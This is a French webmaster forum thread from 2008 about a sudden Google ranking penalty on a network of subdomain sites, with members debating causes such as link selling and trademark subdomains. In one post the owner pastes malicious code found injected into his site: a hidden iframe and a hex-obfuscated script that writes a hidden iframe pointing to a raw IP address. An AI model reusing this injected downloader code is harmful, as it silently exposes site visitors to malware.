|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 12:05 Sujet du message: la clac du 19 janvier |
|
|
Bonjour,
Je pense qu'il y a beaucoup de choses qui bougent en ce moment...
Pour ma part je viens de me prendre la clac made in google et là je ressens vraiment le monopole de cette boite et ça fait très très mal.
J'ai développé une vingtaine de sites en sous domaine du meme domaine principal ( http://c-cher.com ), cette nuit un peu après minuit google m'a envoyé le filtre qui tue tout.
Je me retrouve aux environs de la 5ème page pour TOUTES les requetes que je suis, alors que j'étais auparavant très bien placé sur toutes ces requetes (parfois en position 1 à 3 depuis plus d'un an). Certaines requetes font quelques dizaines de visiteurs, d'autres quelques centaines. Ce qui est très étrange c'est que TOUT soit touché de la meme maniere.
Il y a de tout dans ces sites : avec duplicate, sans duplicate, site monopage, site ayant plusieurs millions de pages indexées. site de plus d'un an et demi, site de quelques semaines...
Je ne sais absolument pas ce que je dois faire, je pense que je vais très certainement ne toucher à rien et attendre, mais ça va etre long...
Je ne sais aussi absolument pas comment je vais faire pour positionner mes prochains sites, tous les sites touchés ayant été construits et référencés souvent de manière différente.
Pour le moment il ne semble pas qu'il y ai beaucoup de monde qui soit touché, mais ça m'étonnerais que je sois le seul. |
|
| |
|
 |
hardmicro WRInaute accro

Inscrit le: 05 Oct 2004 Messages: 1266 Localisation: 11 rue Internet
|
Posté le : Sam Jan 19, 2008 12:17 Sujet du message: la clac du 19 janvier |
|
|
Euh.............
Kaspersky Internet Security 6.0
The requested URL http://c-cher.com/ is infected with Trojan-Downloader.JS.Iframe.as virus
Ton site n'est pas très en forme là !!! C'est le message que sa me met quand je l'ouvre. |
|
| |
|
 |
Szarah WRInaute accro

Inscrit le: 22 Fév 2006 Messages: 7628
|
Posté le : Sam Jan 19, 2008 12:20 Sujet du message: la clac du 19 janvier |
|
|
Le tour des comparateurs serait-il venu de souffrir ?
On va suivre ça avec intérêt. |
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 12:21 Sujet du message: la clac du 19 janvier |
|
|
| hardmicro a écrit: |
Euh.............
Kaspersky Internet Security 6.0
The requested URL http://c-cher.com/ is infected with Trojan-Downloader.JS.Iframe.as virus
Ton site n'est pas très en forme là !!! C'est le message que sa me met quand je l'ouvre. |
oula tu me fais peur là, chez moi je vois rien, je vais regarder ça de pret. |
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 12:37 Sujet du message: la clac du 19 janvier |
|
|
| Szarah a écrit: |
Le tour des comparateurs serait-il venu de souffrir ?
On va suivre ça avec intérêt. |
Ce dont je parle est valable sur tout plein de sites, et pas uniquement le comparateur qui par ailleurs n'est peut etre pas touché par les soucis des autres sites car il n'est placé sur aucune expression concurentielle, la longue traine n'est donc peut etre pas touché (je vais vérifier les stats en live pour etre sur)
pour le site en rade, le code était bien altéré par un hacker, j'ai changé le mdp du ftp et supprimé leur redirection mais j'y connais rien en sécu ça s'annonce hard
voici la copie du code
| Code: |
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4791cc5973751
(v4791cc5973b55){ return(parseInt(v4791cc5973b55,16));}
function v4791cc5974741(v4791cc5974b3f){ var v
4791cc5974f3c='';for(v4791cc5975337=0; v4791cc5975337
<v4791cc5974b3f.length; v4791cc5975337+=2)
{ v4791cc5974f3c+=(String.fromCharCode(v4791cc5973751
(v4791cc5974b3f.substr(v4791cc5975337, 2))));
}return v4791cc5974f3c;} document.write(v4791cc5974741('3C5343524950543E77696E646F772E7374617475
733D27446F6E65273B646F63756D656E742E777269746528273
C696672616D65206E616D653D66207372633D5C276874
74703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E6
8746D6C3F272B4D6174682E726F756E64284D61746
82E72616E646F6D28292A3138363234292B27
353432653535335C272077696474683D3937
206865696768743D313932207374796C65
3D5C27646973706C61793A206E6F6E655C2
73E3C2F696672616D653E27293C2F534352
4950543E'));</script> |
Dernière édition par davidc1 le Sam Jan 19, 2008 13:45; édité 1 fois |
|
| |
|
 |
azzaro78 WRInaute occasionnel

Inscrit le: 08 Jan 2005 Messages: 138 Localisation: PARIS
|
Posté le : Sam Jan 19, 2008 13:23 Sujet du message: "acheter le prochain lien" |
|
|
| tu proposes d'acheter le prochain lien publicitaire .... peut etre est ce la raison de ton malheur????? |
|
| |
|
 |
Darkcity WRInaute accro

Inscrit le: 07 Juin 2007 Messages: 1918
|
Posté le : Sam Jan 19, 2008 13:34 Sujet du message: la clac du 19 janvier |
|
|
| Google pénalise automatiquement les sites où il détecte des malwares, c'est peut-être ça aussi. |
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 13:37 Sujet du message: Re: "acheter le prochain lien" |
|
|
| azzaro78 a écrit: |
| tu proposes d'acheter le prochain lien publicitaire .... peut etre est ce la raison de ton malheur????? |
a priori non, un petit tour ici t'en diras plus sur la vente de lien et ce qu'en pense google :
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=66736 |
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 13:44 Sujet du message: la clac du 19 janvier |
|
|
| Darkcity a écrit: |
| Google pénalise automatiquement les sites où il détecte des malwares, c'est peut-être ça aussi. |
a priori le site a été pénalisé juste avant, les fichiers modifiés par le malware ont été modifiés ce matin vers 11h10. Par ailleurs il me semble que lorsque q'un site a ce soucis, google ne les déclasse pas mais écrit quelque chose du type : "ce site représente un danger..." dans le résultat des recherches.
Il semble de plus que le comparateur n'ai pas trop souffert du déclassement pour ce qui est de la longue traine, le site ressort toujours.
par contre, par exemple le site : http://insolites.c-cher.com faisait plus de 4000 pages vues hier, aujourd'hui il ne va peut etre pas dépasser les 200 !
Dernière édition par davidc1 le Sam Jan 19, 2008 13:52; édité 1 fois |
|
| |
|
 |
finstreet WRInaute accro

Inscrit le: 10 Juil 2005 Messages: 9891
|
Posté le : Sam Jan 19, 2008 13:49 Sujet du message: la clac du 19 janvier |
|
|
C'est vrai que c'est bizarre
Bourrage de mots clés
-http://c-cher.com/auction/index.php
Utilisation des marques sans leur accord
-http://disneyland.c-cher.com/
Sites qui ne sont que des renvois d'affiliation
-tout le réseau
Que des sous domaines
MFA
-http://radio.c-cher.com/
Forum pour vendre des liens et proposer à des webmasters de vendre leur lien
-http://atooprix.com/index.php?board=15.0 |
|
| |
|
 |
Leonick WRInaute accro

Inscrit le: 08 Aoû 2004 Messages: 9061 Localisation: Val de Marne
|
Posté le : Sam Jan 19, 2008 13:51 Sujet du message: la clac du 19 janvier |
|
|
Alors, on récapitule : marque blanche, vente de liens, sans compter le malware, tout ce que google aime  |
|
| |
|
 |
amokk WRInaute passionné

Inscrit le: 09 Mai 2005 Messages: 760
|
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 14:09 Sujet du message: la clac du 19 janvier |
|
|
| Citation: |
Bourrage de mots clés
-http://c-cher.com/auction/index.php |
quels mots clés ?
| Citation: |
Utilisation des marques sans leur accord
-http://disneyland.c-cher.com/ |
j'utilise quoi de manière illégale, tu peux etre précis ?
| Citation: |
MFA
-http://radio.c-cher.com/ |
un MFA qui a environ 60% de returning visitor
Il y a certes plusieurs sites destinés à etre rentabilisés avec adsense mais la plupart ont soit un public qui y revient, soit un nombre de pages vues par visiteur important dans les deux cas le visiteur y trouve son compte et c'est ce que souhaite google en les positionnant correctement.
| Citation: |
Forum pour vendre des liens et proposer à des webmasters de vendre leur lien
-http://atooprix.com/index.php?board=15.0 |
tous les liens vendus sont maintenant en nofollow et c'est ce que préconise google concernant la vente de lien
| Citation: |
| Alors, on récapitule : marque blanche |
,
je n'utilise aucune marque blanche
| Citation: |
| vente de liens, |
en nofollow c'est autorisé
| Citation: |
| sans compter le malware |
a posteriori donc j'ai quelques doutes, je pense que c'est un concours de circonstances. |
|
| |
|
 |
UsagiYojimbo WRInaute accro

Inscrit le: 23 Nov 2005 Messages: 2460 Localisation: Lyon, capitale des Gaules
|
Posté le : Sam Jan 19, 2008 14:15 Sujet du message: la clac du 19 janvier |
|
|
| davidc1 a écrit: |
| Citation: |
Bourrage de mots clés
-http://c-cher.com/auction/index.php |
quels mots clés ?
| Citation: |
Utilisation des marques sans leur accord
-http://disneyland.c-cher.com/ |
j'utilise quoi de manière illégale, tu peux etre précis ? |
Pour le 1) je pense que Finstreet te parle du gros pavé de lien qui est en bas de ta page.
Pour le 2) tu utilises des marques pour faire des sous-domaines optimisés sur des requêtes reliées à ces même marques. |
|
| |
|
 |
davidc1 WRInaute occasionnel

Inscrit le: 16 Avr 2005 Messages: 117
|
Posté le : Sam Jan 19, 2008 14:19 Sujet du message: la clac du 19 janvier |
|
|
Ce que sanctionnerait google c'est la creation subite de nombreux sous-domaines et là c'est pas le cas (une vingtaine en plus d'un an c'est rien)
Quant aux comparateur les stats en live montrent qu'il n'est pas sanctionné, les visiteurs continuent à affluer hormis sur sa requete principale (comparateur de prix) qui générait peu de visiteurs |
|
| |
|
 |
| |
|
|